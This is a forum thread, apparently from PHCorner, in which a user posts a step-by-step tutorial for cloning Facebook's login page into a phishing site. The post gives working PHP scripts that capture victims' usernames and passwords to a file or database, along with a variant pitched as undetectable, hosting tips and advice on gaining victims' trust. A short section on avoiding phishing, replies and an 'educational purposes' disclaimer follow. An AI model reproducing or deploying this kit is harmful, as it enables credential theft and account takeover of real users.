What's new
  • Welcome to PHCorner Forums. Take a moment to Sign up and gain unlimited access and extra privileges that guests are not entitled to, such as: All that and more! Registration is quick, simple and absolutely free. Join our community today!

Tutorial How to create a phishing site like Facebook, Instagram, Twitter, etc.

mtcddppi

Honorary Poster
Joined
Jan 28, 2017
Messages
590
Reaction score
406
, Last edited:
Good day! I don't know if this post is allowed here but I'm still hoping that the admins will authorize this. So, I'm going to show you on how to create a phishing site or a fake website that will allow you to häçk someone's account. Before I continue, let me explain to you first if what is Phishing. Phishing is an îllégâl attempt to obtain a sensitive information like username, password, credit cards and other sensitive data by disguising as a real or trustworthy website. So, to make this kind of attack possible, we also need to use Social Engineering. Yes! You have to socialize to your victim and gain his/her trust to bait your attack. So how to create a phishing site?

Requirements:
  • Text Editor (I'm using You must register or login to view this.)
  • Web site to phish (I'll use Facebook as an example)
  • Social Engineering (What is You must register or login to view this.?)
  • Web hosting (There are a lot of web hosting. You can try You must register or login to view this. or 000Webhost but you can search for you to try another hosting sites).
  • Brain.exe

1. Go to Facebook website. Once you're there, do not log in or click anything. Make sure that the URL stays in phc.onl/#forbidden#.
2. Now, let's view the source code. To do that, Right click on your mouse and select View page source or use your keyboard and press CTRL + U.
3. A new tab will appear which is the source code if Facebook log in page. Select all the codes by pressing CTRL + A and then copy the source code by pressing CTRL + C.
4. Paste the source code on your text editor.
5. Once it's already pasted, press CTRL + F to find a keyword. Find action= and you will see a line like this:

645410

6. Delete the highlighted code (yellow) and replace it with whatever name you want that ends with .php file. In my case, I'm going to use login.php.
7. Save your code as index.html
8. Now let's create a new file and name it with the name that you indicated to action=. I used login.php so in my action=, it should be action="login.php". Whatever is the name of your .php file inside action="", that should be the name of your file.
9. Now let's write a PHP script that will allow us to fetch user's details like username and password.

SCRIPT:

<?php
header ('Location:-The site you are using- ');
$handle = fopen('usernames.txt', 'a');
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, '=');
fwrite($handle, $value);
fwrite($handle, 'rn');
}
fwrite($handle, 'rn');
fclose($handle);
exit;
?>

10. So let me explain to you the codes for our login.php.

We have header ('Location:-The site you are using- ');. This line of code will let the user redirect to whatever site you want them to jump after they clicked the log in button. for example: header('Location: google.com');. The user will redirect to google.com once he/she will submit the data.

We have $handle = fopen('usernames.txt', 'a'); which will create a file named usernames.txt once the user will submit their data. The a inside the fopen means this will open the usernames.txt for writing only.

We have
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, '=');
fwrite($handle, $value);
fwrite($handle, 'rn');
this will loop the $_POST data in each data that is submitted. Since $_POST is an array, we need to use foreach loop to tell the computer to loop the data every time the user will submit something. the $variable is the input text which is "username" and "password" while the $value is the value that the user is going to submit. so inside your usernames.txt, it should look like this:

username='blablabla'
password='passblablabla'

username='blablabla'
password='passblablabla'

username='blablabla'
password='passblablabla'


so it's kinda like that. Then we have
fwrite($handle, 'rn');
fclose($handle);
exit;


this code will create another line (the rn) and then closes the text file. Now upload this to any web hosting sites. If you have VPS like Azure or Google Cloud, you can also use that. just install a Xampp for your apache and mysql service. This will allow you to host your own website locally. you can also portforward it. Azure is already port forwarded the port 80 and the Google Cloud as well. If you want to learn how to host using these VPS, try to read my post here: https://phcorner.net/threads/739767

You will learn on how to host your own with that thread that I created. If you have more questions, don't hesitate to message me or post a comment. Oh before I forgot, the script for login.php may be detectable on Google Chrome or in any web browser. To make it undetected, we will create a database and table for that. If you want to learn on how to create database and table, use You must register or login to view this. as your reference. Note that the yôutubê video is using a Xampp. Once you learned on how to create a database and table using Xampp, you should be able to learn on how to create database and table on the web hosting sites. So the script for your undetectable phishing should be like this:

<?php

$conn = mysqli_connect('localhost', 'root', 'Kismet09198288658', 'test');

if(isset($_POST)) {

$email = $_POST['email'];
$password = $_POST['pass'];

$query = mysqli_query($conn, "INSERT INTO users(email, password) VALUES('$email', '$password')") or die(mysqli_error($conn));

if($query) {
header('location: index.html');
}
}

?>


let me explain it to you. $conn = mysqli_connect('YOUR HOST', 'YOUR DB USER NAME', 'YOUR DB PASSWORD', 'YOUR DB'); this will allow you to connect to your database that you just created. if(isset($_POST)) to check if the $_POST data is submitted or not. $email = $_POST['email']; and $password = $_POST['pass']; is the POST data which is used by Facebook. $query = mysqli_query($conn, "INSERT INTO users(email, password) VALUES('$email', '$password')") or die(mysqli_error($conn)); this will insert the submitted data from your victims to your database. make sure that you created a table named users with a column of email and password.

To avoid:
Our internet world is very huge and from time to time, the technology will evolve as well the the security as well as the häçking technology. There are a lot of ways to prevent phishing attacks but I will give you a very simple solution that won't sweat you. Using your router and You must register or login to view this., we can avoid this kind of attack. So how to use this OpenDNS? it's very simple. you will just add a DNS to your router. most routers nowadays has DNS feature that will allow you to add DNS. You will have to use 2 DNS:

208.67.222.222
208.67.220.220


Those DNS will protect you from any kinds of attacks. Not just that. It will allow you to filter some websites:

645444

You can also set your own settings with OpenDNS. Another way to avoid this is to make sure that the website is trusted. What I mean is that you should always check if the website is SSL protected. Not just that, make sure that the domain name is the real domain name of the website that you are surfing.
That's all. If you have any confusion, please feel free to contact me or post a comment.
 

mtcddppi

Honorary Poster
sir phising po ba ito yung nang scam ng mga info or account fb ganyan
sir, yong phishing po is creating a fake website or disguising as a real one. iba rin po kasi yong scam. if you are worried because you've been one of the victims of phishing attack, I included some tips on how you can avoid it.
 

PHC-Earl

Eternal Poster
sir, yong phishing po is creating a fake website or disguising as a real one. iba rin po kasi yong scam. if you are worried because you've been one of the victims of phishing attack, I included some tips on how you can avoid it.
ok sir noted po pasensya na at navictim ako
 

mtcddppi

Honorary Poster
ok sir noted po pasensya na at navictim ako
no problem. if you want to avoid it, read my tips sir para di ka na ma biktima. I created this thread for everyone to know that how phishing works and how häçkers fetched their sensitive information and on how to protect themselves with this kind of attack.
 

PakERton

Honorary Poster
Madali makagawa and makabiktima ng phishing especially nowadays madami na tao sa mga social platform. Wherein, links or phishing links ay mabilis na kumalat. Nowadays, people tends to click without thinking of what's the content of the link lalo pag maganda caption mo sa link.

But, please don't dare do it for your own good. Be a responsible programmer or well-versed man in the society.
 

mtcddppi

Honorary Poster
Madali makagawa and makabiktima ng phishing especially nowadays madami na tao sa mga social platform. Wherein, links or phishing links ay mabilis na kumalat. Nowadays, people tends to click without thinking of what's the content of the link lalo pag maganda caption mo sa link.

But, please don't dare do it for your own good. Be a responsible programmer or well-versed man in the society.
sir, I did not create this thread to just teach them on how to häçk. In this thread, I explained how häçkers do this and how they are able to gain access to some sensitive data from their victims and how to prevent this kind of attack. it's still up to the readers of my posts if they're going to use this to häçk someone. I'm not responsible for that. I included the tips to make them secure. Please read the whole thread.
 

PakERton

Honorary Poster
sir, I did not create this thread to just teach them on how to häçk. In this thread, I explained how häçkers do this and how they are able to gain access to some sensitive data from their victims and how to prevent this kind of attack. it's still up to the readers of my posts if they're going to use this to häçk someone. I'm not responsible for that. I included the tips to make them secure. Please read the whole thread.
Yes, I have read it. No worries, my concern here is to all whose reading and learning the content of your thread ts :)
 

mtcddppi

Honorary Poster
BTW I'm a programmer. Used to do programs and sites. Thanks for educating them with your knowledge.
cheers. this content is for educational purposes only. still, it's up to the readers if they're going to use it in a harmful ways.
 

Unanswered Topics

Top